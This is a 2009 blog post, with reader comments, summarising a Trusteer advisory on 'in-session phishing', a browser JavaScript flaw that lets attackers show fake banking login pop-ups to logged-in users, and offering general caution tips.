«

New bug found in Browsers – Berth of In-session Phishing

Posted by Arun
January 13, 2009

Bug found in all the Major Browsers!

A new kind of vulnerability is found in all the major browsers which makes it easier for the criminals to steal online banking credentials using the latest way of Phishing called ‘In-Session Phishing’.

As per the Advisory issued by Trusteer, an Enterprise and consumer Desktop Security organization, this type of attack seem more believable as there is a bug found in the JavaScript engines of all the most-widely used Browsers.

What is In-Session Phishing?

It’s a sophisticated and highly effective Phishing attack technique that is carried out while a user is in active session with a Secure Banking, Brokerage or other Sensitive Web Application.

How does it work?

The bad guys (attackers) hack a legitimate web site and insert HTML code which looks like a pop-up security alert. The pop-up would then ask the victim to enter password and login information, and possibly answer other security questions used by the banks to verify the identity of their customers.

More on In Session Phishing Attack (PDF) from Trusteer.

How is it different from traditional Phishing?

In a traditional Phishing attack, the attackers send out millions of e-mail messages disguised to look like they come from a legitimate source, such as banks or financial institutions.

These messages are often blocked by spam filtering software. With in-session phishing, the email message is replaced by a pop-up browser window.

Measures being taken

By studying the way browsers use JavaScript, the team at Trusteer’s found a way to identify whether or not someone is logged into a Web site, by use of a JavaScript function. All the browser makers have been informed. One can expect the bug will eventually get patched by the browser makers.

Until then, criminals who discover the flaw could write code that checks whether Web surfers are logged into, for example, a predetermined list of 100 banking sites. “Instead of just popping up this random phishing message, an attacker can get more sophisticated by probing and finding out whether the user is currently logged into one of 100 financial institution Web sites

Conclusion

Yet another browser vulnerability. Few weeks ago Microsoft asked it users to update their browser with a patch to prevent from a Security vulnerability. Software Product makers will always have their hands full as they have long term clients in the form of Hackers!

Technorati Tags: , , ,

Add to Del.cio.us RSS Feed Add to Technorati Favorites Stumble It! Digg It!

Security

If you enjoyed this post, please consider to leave a comment or subscribe to the feed and get future articles delivered to your feed reader.

Comments
Comment by Nihar on January 14, 2009 @ 3:08 PM

@Arun, you are right. software product gaints have thier regular client :) It is always good that we be vigiliant and don’t enter password when we get popup window to enter. Always enter the password from the regular login window

Nihar´s last blog post..Download Free Windows 7 Themes, Wallpapers, Gadgets

Comment by TechZoomIn on January 14, 2009 @ 6:19 PM

Its too challenging for the companies and users also.What ever the safety measures you take,these bad guys doesn’t stop to enter into your life :)

TechZoomIn´s last blog post..WDW Adsense Plugin:Complete Adsense Solutions

Comment by Arun on January 15, 2009 @ 8:30 PM

@Nihar, Yes. You are correct. My awareness on these issues have increased. I’m very cautious.

@TechZoomin, being cautious is the only solution. Of course, being suspicious also helps!

Comment by Sueblimely on January 19, 2009 @ 7:30 PM

The worrying thing is that banks do produce popup login screens. How hard would it be for phishers to duplicate these to make them look authentic?

Sueblimely´s last blog post..Blogging Christmas Challenge

Comment by Arun on January 20, 2009 @ 7:22 PM

@Sueblimely, it may not be that difficult for the bad guys to duplicate the pop-ups. Instead, the difficulty lies with the banks to ensure they serve authentic pop-ups to its users!

Comment by Sean from personal checks on June 6, 2009 @ 6:19 AM

That’s great! Your post is very nice and informative. You have helped me to improve my poor knowledge about In-Session Phishing. Many thanks for your share.

Sean´s last blog post..Spotted a Trend

Comment by Shaz from Photoshop Tutorials on June 12, 2009 @ 7:23 PM

Wow its really a very good idea to patch up your browsers so you can assure your web money is secured, you won’t know it unless your money is been withdrawn by other people you don’t know…

Comment by Max from Website Hosting on June 23, 2009 @ 2:20 AM

Ah, I’ve never heard about this until now, and I usually use the internet every day. Things like this scare me. I would probably fall for a trick like this if I wasn’t paying attention to what I was doing. Thanks for sharing this information.

Comment by Tomo from Free Business Cards on June 24, 2009 @ 12:37 AM

never trust any email that says your paypal cash has bee nwithdrawn last blah blah blah and gives you a link to paypal to login. It is 100% phishing site so to make sure, open a separate window and type the paypal address yourself then login to see if your balance did really changed.

Comment by Peter from best antivirus software on September 11, 2009 @ 5:24 PM

Hmm. Aside from the essentials (good antivirus, anitispyware, firewall and all available OS updates) it seems like user knowledge is required to spot these new vulnerabilites. How do you teach someone to spot the difference between a real prompt and a phishing attempt?
Peter@best antivirus software´s last blog ..Prevent Virus Infection My ComLuv Profile

Leave a comment

(required)

(required)


CommentLuv Enabled

This site uses KeywordLuv. Enter YourName@YourKeywords in the Name field to take advantage.

»